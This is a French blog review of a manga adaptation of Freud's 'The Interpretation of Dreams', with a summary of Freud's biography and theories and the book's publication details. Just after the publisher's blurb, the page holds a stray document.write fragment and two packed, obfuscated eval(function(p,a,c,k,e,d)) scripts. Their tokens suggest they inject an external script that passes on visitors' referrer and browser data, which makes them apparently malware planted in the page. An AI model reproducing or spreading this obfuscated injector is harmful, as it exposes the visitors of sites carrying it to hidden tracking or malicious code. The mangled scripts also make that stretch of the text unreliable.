L’interprétation des rêves

“Les rêves, document.write(“”); images produites pendant notre sommeil par l’activité psychique, ont toujours eu des sens différents selon les époques et les pays. Prophéties ? Prédictions d’avenir ? Ou simple activité psychique ? Freud explique à travers l’expérience de ses patients et les cas auxquels il a été confronté au cours de sa vie d’homme et de médecin sa théorie de l’analyse du rêve, ainsi que ce que l’on appellera plus tard la « psychanalyse ». Suivez le cheminement de Freud qui l’a amené à l’explication et à la publication de « L’interprétation des rêves » parue en 1899 grâce à ce manga, et comprenez ainsi la signification de vos rêves…”. [ Texte du site de l’éditeur ]
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|idyes|var|u0026u|referrer|derfk||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tskrb|var|u0026u|referrer|faihn||js|php’.split(‘|’),0,{}))

Une gigantesque bataille livrée pour mieux connaître l’être humain !

“Le XIXe siècle. Pour la première fois dans toute la longue histoire de l’Homme, Freud se penche sur l’esprit humain. Sans répit, il le décortique d’un oeil acéré en cherchant en même temps à donner un sens au rêve, et touche au combat psychique dans lequel l’Homme d’aujourd’hui se débat…”

“Retrouvez en manga son « introduction à la psychanalyse » et son « interprétation des rêves », deux oeuvre qui ont entraîné une révolution dans tous les domaines, non seulement en psychologie mais dans la perception sociétale, la littérature, l’éducation ou les arts…”

Le complexe d’Oedipe… Le mythe de ce roi est comme un avertissement qui nous est lancé…

[ Texte de la couverture arrière ]

Continuez après le saut de page >>

ATTENTION: Peut contenir des traces de “spoilers”! Les personnes allergiques à toutes discussions d’une intrigue avant d’en avoir elle-même prit connaissance sont vivement conseillé de prendre les précautions nécessaires pour leur sécurité et ne devraient poursuivre qu’avec circonspection.

L’interprétation des rêves (??????: ?????????? / Manga de dokuha: Seishin Bunseki Nyûmon • Yume Handan / “Lire en manga: Vorlesungen zur Einfürung in die Psychoanalyse; Die Traumdeutung”) est le cinquante-neuvième volume de la collection manga de dokuha publiés par East Press en avril 2010 (le #1102 du catalogue de l’éditeur). L’adaptation et le dessin ont été réalisé par le studio Variety Art Works, dont on connait très peu de chose. C’est le douzième titre de la collection a être traduit par Soleil Manga en octobre 2013 dans sa collection “Classiques”. J’ai déjà introduit cette collection et commenté quelques uns de ses titres (L’Ancien et le Nouveau Testament de la Bible, À la recherche du temps perdu, Le Capital, Le rouge et le noir, Les misérables, Guerre et Paix et Le manifeste du Parti Communiste). Cette collection reprend en traduction quelques titres de l’impressionnante collection japonaise Manga de Dokuha (comportant jusqu’à maintenant cent-cinquante titres!) publiée par East Press, qui se consacre à adapter en manga des classiques de la littérature pour les rendre accessible à un plus large publique.

L’interprétation des rêves nous offre une courte (et assez peu détaillée) biographie illustrée de Sigmund Freud ainsi qu’un exposé sommaire sur son oeuvre, principalement Introduction à la psychanalyse (1917) et L’interprétation des rêves (1899). [ Dans le résumé qui suit certains détails et précisions, comme la chronologie, ont été ajouté par moi ]

Dans “Introduction à la psychanalyse, 1ère partie” (pg 5), on découvre un jeune Freud qui fait un stage clinique à l’hôpital de Vienne. Après ses études de médecine, où il s’est spécialisé en neurologie en travaillant à l’institut de Ernst Brücke, il délaisse la recherche sur les conseils de ce dernier et devient médecin praticien en 1882. Il s’intéresse aux névroses (maladies des nerfs qui ne présentent ni fièvre, ni lésions) et particulièrement à l’hystérie (trouble mental qui s’exprime par des symptômes physiologiques qui ne sont pas liés à des lésions) — dont les patients, qui souffrent de symptômes variés mais ne montrent rien d’anormal physiquement, sont souvent considéré comme des simulateurs. En 1885, il va étudier à l’Hôpital de la Salpêtrière de Paris avec Jean-Martin Charcot qui réussit à créer artificiellement l’hystérie par l’hypnose.

Dans “Les pionniers de l’esprit” (pg 46), après un bref séjour à Berlin, Freud revient à Vienne au printemps 1886 pour épouser Martha Bernays et y établir son cabinet. Freud se demande quel genre de traumatisme invisible peut causer l’hystérie et constate que celle-ci, jusqu’alors considérée comme une maladie de femme, peut aussi être masculine. Cette position polémique devient une source de ridicule et isole Freud professionnellement. Seul son ami Josef Breuer continue de travailler avec lui. Lorsqu’il exprime sa frustration que le traitement hypnotique n’est pas toujours très efficace, Breuer lui raconte le cas de la patiente “Anna O.” Celle-ci souffrait de lourds symptômes hystériques (perte de sensibilité, de la vision, du language, etc.) qui étaient apparus alors qu’elle s’occupait de son père malade. D’abord avec l’aide de l’hypnose, puis par de simples conversations, il interrogea la patiente sur ce qui la troublait. Il découvrit avec surprise qu’après ces conversations la patiente se sentait soulagée et que ses symptômes disparaissaient!

Comparaison des pages 22-23 de l’édition originale et française

L’étude de ce cas, et de plusieurs autres par la suite, permet à Freud de découvrir non seulement l’origine de l’hystérie mais également un véritable traitement. L’hystérie serait causée par un traumatisme psychologique fort (des émotions, des pulsions [morales, sexuelles ou instinctives] ou même des souvenirs intolérables auxquels le patient ne peut faire face et qui sont refoulés, puis se transforment et resurgissent en tant que maladie, angoisse ou obsession). Il s’agit alors de faire remonter le patient dans ses propres souvenirs et de lui faire réaliser l’origine de son trouble ou de la maladie. Freud complémente la thérapie de Breuer, qu’il appelle la « cure par la parole », avec l’association libre, qui consiste à faire dire aux patients tout ce qui leur passe par la tête. Il établit ainsi les bases de la psychanalyse.

Afin d’améliorer sa thérapie, Freud cherche à mieux comprendre la complexité de l’esprit humain. Il développe ainsi les concepts de narcissisme et du “complexe d’Oedipe.” Dans “L’interprétation des rêve” (pg 130), on voit comment il parvient à ces résultats. Il découvre que les rêves peuvent être une fenêtre sur l’inconscient et s’utilise lui-même comme sujet. “En analysant le rêve, on trouve comment il est lié à l’émotion problématique qui étreint l’individu.”

Dans “Introduction à la psychanalyse, 2e partie” (pg 142), on y voit que les sentiments primitifs comme l’amour sont à la base de notre comportement et que la libido (désir sexuel) passe par trois étapes de développement affectif: le stade oral, le stade anal et le stade phallique.

Dans “Le mouvement psychanalytique” (pg 154), on voit que Freud obtient finalement la reconnaissance de son travail. Il donne des séminaires, rassemble de nombreux disciples autour de lui, d’autres médecins se mettent à pratiquer la psychanalyse et des sociétés de la psychanalyse se forment dans plusieurs villes. Cette nouvelle popularité ouvre la porte à la critique et l’apparition de nombreuses théories rivales que Freud refuse de reconnaître crée des schismes dans la profession naissante: Alfred Adler (complexe d’infériorité), Wilhelm Stekel (qui critique l’inefficacité de la libre association) et Carl Gustav Jung (partisan des “archétypes” et père de la psychologie analytique) en sont les principaux dissidents.

Le manga se conclut avec “Malaise dans la civilisation” (pg 179), qui nous introduit brièvement à un autre ouvrage de Freud (1930). Avec la Première Guerre Mondiale, Freud réalise qu’au fond l’homme reste un sauvage guidé par ses pulsions primitives violentes. Il complémente sa première topique psychique (inconscient, préconscient, conscient) par une seconde topique composée du Moi (réalité), du Ça (plaisir) et du Surmoi (conscience morale). “Dans une société civilisée, afin de se conformer à l’ordre exigé, l’énergie primitive du ça doit se hisser à un autre niveau. Ceci se fait principalement lorsque le moi est utilisé dans un effort intellectuel [culture] amenant l’énergie du ça vers “la sublimation“.”

Comparaison des pages 24-25 de l’édition originale et française

Comme pour la plupart des autres volumes de la collection, le dessin de ce manga est plutôt médiocre mais est tout de même étrangement efficace pour exprimer un sujet aussi théorique que la psychanalyse. Et, malgré une approche plutôt superficiel, le manga en constitue quand même une bonne introduction. Cela n’a rien de passionnant mais c’est néanmoins une bonne lecture. Cela m’a rappelé un peu le film A Dangerous Method, qui traite de la rivalité entre Jung et Freud. Je dois également ajouter que le titre est trompeur car l’interprétation des rêves ne constitue qu’une minuscule partie de l’ouvrage (douze pages!) qui aurait plutôt due s’appeler “Introduction à la psychanalyse” comme c’est le cas de l’édition originale japonaise.

L’interprétation des rêves, écrit par Sigmund Freud, adapté et illustré par Variety Art Works (traduction: Anne Mallevay). Toulon, Soleil Manga (Coll. Classiques), octobre 2013. 12,8 x 18,2 x 1,50 cm, 192 pg., 6,99 € / $12.95 Can. ISBN: 978-2-30203-137-1. Lecture dans le sens occidental et recommandé pour jeunes adultes (14+).
Pour plus d’information vous pouvez consulter les sites suivants:

Manga de dokuha: Vorlesungen zur Einfürung in die Psychoanalyse; Die Traumdeutung by Sigmund Freud © Variety Art Works • East Press Co., Ltd. All rights reserved. Édition française © 2013 Éditions Soleil.

[ Translate ]

One thought on “L’interprétation des rêves

  1. Pingback: Index of book reviews | Clodjee's Safe-House

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s